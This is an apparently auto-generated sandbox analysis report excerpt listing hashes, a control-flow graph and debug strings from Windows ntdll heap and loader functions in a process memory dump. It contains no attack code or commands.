                                                  • API ID: DebugPrintTimes
                                                  • String ID: $ $0
                                                  • API String ID: 3446177414-3352262554
                                                  • Opcode ID: 55f19525272704298500b318c643bfd91997833a610636b6a06a99f7c98ffe31
                                                  • Instruction ID: c2328c96c4b6b592d54036dbba6f533b13f2c1ab89a21728e1a9d00b9ddeabd3
                                                  • Opcode Fuzzy Hash: 55f19525272704298500b318c643bfd91997833a610636b6a06a99f7c98ffe31
                                                  • Instruction Fuzzy Hash: E03223B1A093818FE310CF69C885B5BBBE5BBC8345F10496EF5D987250E7B5D848CB52

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 940 3603fdf4-3603fe16 call 35fe7be4 943 3603fe35-3603fe4d call 35f87662 940->943 944 3603fe18-3603fe30 RtlDebugPrintTimes 940->944 949 3603fe53-3603fe69 943->949 950 36040277 943->950 948 360402d1-360402e0 944->948 952 3603fe70-3603fe72 949->952 953 3603fe6b-3603fe6e 949->953 951 3604027a-360402ce call 360402e6 950->951 951->948 955 3603fe73-3603fe8a 952->955 953->955 957 3603fe90-3603fe93 955->957 958 36040231-3604023a GetPEB 955->958 957->958 962 3603fe99-3603fea2 957->962 960 3604023c-36040257 GetPEB call 35f8b910 958->960 961 36040259-3604025e call 35f8b910 958->961 970 36040263-36040274 call 35f8b910 960->970 961->970 963 3603fea4-3603febb call 35f9fed0 962->963 964 3603febe-3603fed1 call 36040835 962->964 963->964 974 3603fed3-3603feda 964->974 975 3603fedc-3603fef0 call 35f8753f 964->975 970->950 974->975 979 3603fef6-3603ff02 GetPEB 975->979 980 36040122-36040127 975->980 981 3603ff70-3603ff7b 979->981 982 3603ff04-3603ff07 979->982 980->951 983 3604012d-36040139 GetPEB 980->983 984 3603ff81-3603ff88 981->984 985 36040068-3604007a call 35fa2710 981->985 986 3603ff26-3603ff2b call 35f8b910 982->986 987 3603ff09-3603ff24 GetPEB call 35f8b910 982->987 988 360401a7-360401b2 983->988 989 3604013b-3604013e 983->989 984->985 992 3603ff8e-3603ff97 984->992 1008 36040110-3604011d call 36040d24 call 36040835 985->1008 1009 36040080-36040087 985->1009 998 3603ff30-3603ff51 call 35f8b910 GetPEB 986->998 987->998 988->951 993 360401b8-360401c3 988->993 995 36040140-3604015b GetPEB call 35f8b910 989->995 996 3604015d-36040162 call 35f8b910 989->996 1001 3603ff99-3603ffa9 992->1001 1002 3603ffb8-3603ffbc 992->1002 993->951 1003 360401c9-360401d4 993->1003 1007 36040167-3604017b call 35f8b910 995->1007 996->1007 998->985 1027 3603ff57-3603ff6b 998->1027 1001->1002 1010 3603ffab-3603ffb5 call 3604d646 1001->1010 1012 3603ffce-3603ffd4 1002->1012 1013 3603ffbe-3603ffcc call 35fc3ae9 1002->1013 1003->951 
1011 360401da-360401e3 GetPEB 1003->1011 1038 3604017e-36040188 GetPEB 1007->1038 1008->980 1017 36040092-3604009a 1009->1017 1018 36040089-36040090 1009->1018 1010->1002 1021 360401e5-36040200 GetPEB call 35f8b910 1011->1021 1022 36040202-36040207 call 35f8b910 1011->1022 1014 3603ffd7-3603ffe0 1012->1014 1013->1014 1025 3603fff2-3603fff5 1014->1025 1026 3603ffe2-3603fff0 1014->1026 1029 3604009c-360400ac 1017->1029 1030 360400b8-360400bc 1017->1030 1018->1017 1035 3604020c-3604022c call 3603823a call 35f8b910 1021->1035 1022->1035 1036 36040065 1025->1036 1037 3603fff7-3603fffe 1025->1037 1026->1025 1027->985 1029->1030 1039 360400ae-360400b3 call 3604d646 1029->1039 1041 360400ec-360400f2 1030->1041 1042 360400be-360400d1 call 35fc3ae9 1030->1042 1035->1038 1036->985 1037->1036 1045 36040000-3604000b 1037->1045 1038->951 1047 3604018e-360401a2 1038->1047 1039->1030 1046 360400f5-360400fc 1041->1046 1054 360400e3 1042->1054 1055 360400d3-360400e1 call 35fbfdb9 1042->1055 1045->1036 1051 3604000d-36040016 GetPEB 1045->1051 1046->1008 1052 360400fe-3604010e 1046->1052 1047->951 1057 36040035-3604003a call 35f8b910 1051->1057 1058 36040018-36040033 GetPEB call 35f8b910 1051->1058 1052->1008 1060 360400e6-360400ea 1054->1060 1055->1060 1066 3604003f-3604005d call 3603823a call 35f8b910 1057->1066 1058->1066 1060->1046 1066->1036
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                  • API String ID: 3446177414-1700792311
                                                  • Opcode ID: 36f0e63cb122126a7eb4c380d28a53dc615f5732ba90a6e4544b10d170f49685
                                                  • Instruction ID: ec333785bc4743a0682097979adecd04c8f6bfce10d1a74cb94da1dd0d493ff3
                                                  • Opcode Fuzzy Hash: 36f0e63cb122126a7eb4c380d28a53dc615f5732ba90a6e4544b10d170f49685
                                                  • Instruction Fuzzy Hash: B2D11039A00645DFDB12EFA4C542AADBFF2FF09704F4488E9E855AB261C7359941CF50
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                  • API String ID: 3446177414-1745908468
                                                  • Opcode ID: e482ff1ebbcaffd6ae0f001960fb6790aec811a59aef645c0cdcc0f79eec6d84
                                                  • Instruction ID: b0071f3519b1dc8c6fa2ffb921e58f1a2177d2dbab17e5341cead253bc799cbe
                                                  • Opcode Fuzzy Hash: e482ff1ebbcaffd6ae0f001960fb6790aec811a59aef645c0cdcc0f79eec6d84
                                                  • Instruction Fuzzy Hash: 3E914379A02784DFDB01CFA9C442AADBFF2FF49314F2488D9E454AB261CB369941CB11
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                  • API String ID: 0-3532704233
                                                  • Opcode ID: 510d291c5590aa7c5fdd266263fab21efe8f0117dc9154427c4697ff861a7587
                                                  • Instruction ID: 11209e7af1efccc09d24aeeb59e50ac673d0fad16a7fdc02d38645ce41113864
                                                  • Opcode Fuzzy Hash: 510d291c5590aa7c5fdd266263fab21efe8f0117dc9154427c4697ff861a7587
                                                  • Instruction Fuzzy Hash: 7FB189B69083559FD711CF24C884A5FBBE9BF89754F424D2EF889DB240DB70D9088B92
                                                  APIs
                                                  • RtlDebugPrintTimes.NTDLL ref: 35FBD879
                                                    • Part of subcall function 35F94779: RtlDebugPrintTimes.NTDLL ref: 35F94817
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-1975516107
                                                  • Opcode ID: 84f6bcda8680b90e9d655cf0a5845afe1a4513fd88bb7fd27ced210bb203ced5
                                                  • Instruction ID: b5f0f83785d810892364a384cc9d908ded77437cc0b14face8674b15f166fe9b
                                                  • Opcode Fuzzy Hash: 84f6bcda8680b90e9d655cf0a5845afe1a4513fd88bb7fd27ced210bb203ced5
                                                  • Instruction Fuzzy Hash: 1251F176E04349DFEF09CFA5C445B8EBBB2BF44314F224859C905AB281D7B59942CBC2
                                                  Strings
                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 35F8D202
                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 35F8D0E6
                                                  • @, xrefs: 35F8D24F
                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 35F8D263
                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 35F8D06F
                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 35F8D136
                                                  • @, xrefs: 35F8D2B3
                                                  • @, xrefs: 35F8D09D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                  • API String ID: 0-1356375266
                                                  • Opcode ID: fd0aba763280dcd1941f0f69e1469a4b5e46ef5b1c60187e8337dd45d348dce2
                                                  • Instruction ID: 3909391eafa43b05044dc48fbfbd20e398ad9b4201986b67ed5b22f425e87ad8
                                                  • Opcode Fuzzy Hash: fd0aba763280dcd1941f0f69e1469a4b5e46ef5b1c60187e8337dd45d348dce2
                                                  • Instruction Fuzzy Hash: C5A129B25087459FE321CF24C884B5BB7E8BF84759F414D2EF989D6240EB78D908CB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                  • API String ID: 0-2224505338
                                                  • Opcode ID: 8e3f0f2d80a58e9eb6392c0362975b3195c61d68dcf3e29a259675188b50bda7
                                                  • Instruction ID: b6f954c56cefe60a822128fecd0e8119a05838a988d455f95b76bde8c681ed8e
                                                  • Opcode Fuzzy Hash: 8e3f0f2d80a58e9eb6392c0362975b3195c61d68dcf3e29a259675188b50bda7
                                                  • Instruction Fuzzy Hash: 02510336612244EFD701CFA4C985E6ABBF5FF04A69F218CE9F415AB261CA35D940CF50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-523794902
                                                  • Opcode ID: a01a12d6fa329223cb543ae90fe304826f9646b807c2970ac1639291b82d6c52
                                                  • Instruction ID: 9fc258d47ad93e4e620c8d8690a3fad4b50ce4bc919f081195b37da2c9582664
                                                  • Opcode Fuzzy Hash: a01a12d6fa329223cb543ae90fe304826f9646b807c2970ac1639291b82d6c52
                                                  • Instruction Fuzzy Hash: 5142EE762087819FD305CF28C884A2ABBEAFF88744F444DADE895CB751DB74E845CB52
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                  • API String ID: 0-122214566
                                                  • Opcode ID: 19c121b01fdd71747236a57e2faf26ca1cf7ca193f511ed0b2c5b25b1af3a6a3
                                                  • Instruction ID: 507759a95b5f7b4f9568f7988c524cd27eb9e857868bb78c3071819cb7fd9e87
                                                  • Opcode Fuzzy Hash: 19c121b01fdd71747236a57e2faf26ca1cf7ca193f511ed0b2c5b25b1af3a6a3
                                                  • Instruction Fuzzy Hash: 40C17877B143159BEB05CB64CC90BBE77B5BF45304F544D6AE802AB2A0EBB4D844CB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-4253913091
                                                  • Opcode ID: 7809c50f36882ad683b526ed79401282e78907bef45293a29dee7b27236dd32f
                                                  • Instruction ID: 7ef4dd5eae6d04d704ec0cf02ec35fb4be3b82fc49c52a390b93f09d701fedf3
                                                  • Opcode Fuzzy Hash: 7809c50f36882ad683b526ed79401282e78907bef45293a29dee7b27236dd32f
                                                  • Instruction Fuzzy Hash: A2F1EF76604606EFEB05CF68D884F6AB7BAFF44300F1049A8E4169B790D775E981CF91
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-2283098728
                                                  • Opcode ID: 320b3ca3dc58caaf035d7382261598588b7d5a3f77fd4e83a23c1fc097c485be
                                                  • Instruction ID: 60b326408043bd6685b674ae939c6aff6bf2e45a0e4572e4c29439ac1aba78ee
                                                  • Opcode Fuzzy Hash: 320b3ca3dc58caaf035d7382261598588b7d5a3f77fd4e83a23c1fc097c485be
                                                  • Instruction Fuzzy Hash: 04512476704305DBEB14DF3ACA80A1A7BF6BF84310F140E6CE55297691EBB4D814CB92
                                                  Strings
                                                  • Kernel-MUI-Language-SKU, xrefs: 35FB534B
                                                  • Kernel-MUI-Language-Allowed, xrefs: 35FB519B
                                                  • WindowsExcludedProcs, xrefs: 35FB514A
                                                  • Kernel-MUI-Number-Allowed, xrefs: 35FB5167
                                                  • Kernel-MUI-Language-Disallowed, xrefs: 35FB5272
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                  • API String ID: 0-258546922
                                                  • Opcode ID: a8a34726bb2f132363252e747a8b44e2249a9fc70bd014d03ead335ee1936be8
                                                  • Instruction ID: 4cec52b7ba7889e38ae467c377467ac1531189b151336fee7384925acea50cb4
                                                  • Opcode Fuzzy Hash: a8a34726bb2f132363252e747a8b44e2249a9fc70bd014d03ead335ee1936be8
                                                  • Instruction Fuzzy Hash: 21F15E76E04219EFDF11CF99C980AEEB7F9FF08650F54485AE901A7250E7B59E01CBA0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: ebe394a323186bc1c056c460fd6f3f12a723d04b029c3593189e4eb2cb849e4a
                                                  • Instruction ID: 863d6170e544ae958a539b3bfd19b6788f9143d2f1e9e990cfe760035528a695
                                                  • Opcode Fuzzy Hash: ebe394a323186bc1c056c460fd6f3f12a723d04b029c3593189e4eb2cb849e4a
                                                  • Instruction Fuzzy Hash: 04F116B2F002119BDB08DF6AC99267DFFF5EF88204B5541A9D856EB380E774E941CB50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                  • API String ID: 0-3061284088
                                                  • Opcode ID: c59de9b26eb09d710caa7ed6bebd64d4ef37b4fda04fb10d02fbc126d50a2a53
                                                  • Instruction ID: 930a4c012abb5af7bf05b9b0a26eb50515b68c88329c0824c7c5c2c7e63e8aa7
                                                  • Opcode Fuzzy Hash: c59de9b26eb09d710caa7ed6bebd64d4ef37b4fda04fb10d02fbc126d50a2a53
                                                  • Instruction Fuzzy Hash: 17014E37119250AFE319C728D40DF967BB5FB41734F154DDAE4604BAA1CF699840D570
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$.mui$.mun$SystemResources\
                                                  • API String ID: 0-3047833772
                                                  • Opcode ID: ecc65b54363121e25d7dcb3668c1cf02dd9ef6afbc81522cc2c18a780de1f55b
                                                  • Instruction ID: 4fbe265eaceb07e3c16fa3ad0971f78c23d44e48d80a9039956a08f7444d92d2
                                                  • Opcode Fuzzy Hash: ecc65b54363121e25d7dcb3668c1cf02dd9ef6afbc81522cc2c18a780de1f55b
                                                  • Instruction Fuzzy Hash: 44625C76B007298FEB25CF54CC40BD9B7B9BB0A354F4049E9D409A7A50DB719E84CF52
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: 385f0f5721688bb0953bb494b3bfb65fb8ded2acfb824c7def5ba47b34e7ae4a
                                                  • Instruction ID: 861b3faa54b7eeb2fed7bc677750825adc4d94a14434593162519c6945e70c11
                                                  • Opcode Fuzzy Hash: 385f0f5721688bb0953bb494b3bfb65fb8ded2acfb824c7def5ba47b34e7ae4a
                                                  • Instruction Fuzzy Hash: 93E2F276A04755CFEB15CF68C884BA9BBF1FF48304F1489A9D849AB385D770A841CF92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                  • API String ID: 0-2586055223
                                                  • Opcode ID: 7ba760903ed1776c7a35da7f86350aa0df58cee2aaa52191d81848020e53b920
                                                  • Instruction ID: 48cf95740d1a6fe7c36ff5112234ef59d95cebf9a4cd8ec15708334f8dd1ae43
                                                  • Opcode Fuzzy Hash: 7ba760903ed1776c7a35da7f86350aa0df58cee2aaa52191d81848020e53b920
                                                  • Instruction Fuzzy Hash: B661F276208380AFE312CB64DC44F17B7E9FF84758F050DA9EA648B2A1C734D840CB62
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                  • API String ID: 2994545307-1391187441
                                                  • Opcode ID: 5f729dad2df4f59887f9131eafa172626b1b1166ee8237294f95921dc0861833
                                                  • Instruction ID: d41d6d61b7286c430ec5c6d7f1956187f10d39ab1a118b1dd26b05d52d873308
                                                  • Opcode Fuzzy Hash: 5f729dad2df4f59887f9131eafa172626b1b1166ee8237294f95921dc0861833
                                                  • Instruction Fuzzy Hash: 0D310436A05204EFDB01CB94CD84F9BB7B9FF447B0F5548A1E825AB291DB30EA41CA60
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                  • API String ID: 0-1880532218
                                                  • Opcode ID: 53831bf52e5cbade7cb43bfd3b2d03701728de6aa331c76bcbe768160bebb88a
                                                  • Instruction ID: f26114b6a662942d4b849ea9f2f7532d6a187fc0e6cf5c4904aedd94b2927b3f
                                                  • Opcode Fuzzy Hash: 53831bf52e5cbade7cb43bfd3b2d03701728de6aa331c76bcbe768160bebb88a
                                                  • Instruction Fuzzy Hash: AD21727AE01214ABD709CB68DD42B9EBFF5AF45788F1940EAE805A7340EB34D906C790
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 80e3061e25540da73d06713c35d95fe6a817a2e9b88e5ce4f6f520783d073ecb
                                                  • Instruction ID: e91135ae1e61aee4d22b7b9cc7b899a7c9b5aaf7395729dcd2ea5f42e1aeeaab
                                                  • Opcode Fuzzy Hash: 80e3061e25540da73d06713c35d95fe6a817a2e9b88e5ce4f6f520783d073ecb
                                                  • Instruction Fuzzy Hash: 27514235A05B05EFFB09EF24C844FADB7B9FF45355F10896AE502976A0DBB0A911CB80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                  • API String ID: 0-1168191160
                                                  • Opcode ID: d9feab1f054e2e344fe3c4638ecbced764b512a0fa1ca5ff6ff240a849c72740
                                                  • Instruction ID: a721868b90216f641ef4ca9974037b5916be3da9be3980ff20be0dd1f61fee9f
                                                  • Opcode Fuzzy Hash: d9feab1f054e2e344fe3c4638ecbced764b512a0fa1ca5ff6ff240a849c72740
                                                  • Instruction Fuzzy Hash: ABF170B5E002288FDB29CF25CC81B99BBB5EF44744F5484E9DA09A7240EB319EC5CF95
                                                  Strings
                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 35F91648
